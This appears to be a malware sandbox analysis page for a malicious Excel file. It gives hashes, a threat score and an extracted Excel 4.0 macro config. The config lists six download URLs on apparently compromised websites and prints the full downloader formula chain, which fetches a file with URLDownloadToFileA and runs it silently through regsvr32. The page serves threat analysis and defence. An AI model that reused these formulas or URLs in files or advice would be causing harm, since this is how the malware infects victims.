General

  • Target

    77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

  • Size

    43KB

  • Sample

    240909-1rymbatgnb

  • MD5

    b51c33433677367fc5cf4698f54005d1

  • SHA1

    b1613ba78ba371eaeaecd9c29a768179eabd5afc

  • SHA256

    77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

  • SHA512

    bc8baebfcda195174e26a695dcdcccc6318171109515ef69e7434be622921f87f0b5c00ee1c30721c3515979f0156422d0733667e577e2cc572bd81ee6957588

  • SSDEEP

    768:gCgW/w0HGfdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gFHJneAWl2r49:tgWZmsb6yVwpFB1CuEge7tgnes89

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/

http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/

https://ramijabali.com/licenses/44KGV1/

https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/

http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/

https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ramijabali.com/licenses/44KGV1/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Targets

    • Target

      77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

    • Size

      43KB

    • MD5

      b51c33433677367fc5cf4698f54005d1

    • SHA1

      b1613ba78ba371eaeaecd9c29a768179eabd5afc

    • SHA256

      77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

    • SHA512

      bc8baebfcda195174e26a695dcdcccc6318171109515ef69e7434be622921f87f0b5c00ee1c30721c3515979f0156422d0733667e577e2cc572bd81ee6957588

    • SSDEEP

      768:gCgW/w0HGfdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gFHJneAWl2r49:tgWZmsb6yVwpFB1CuEge7tgnes89

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks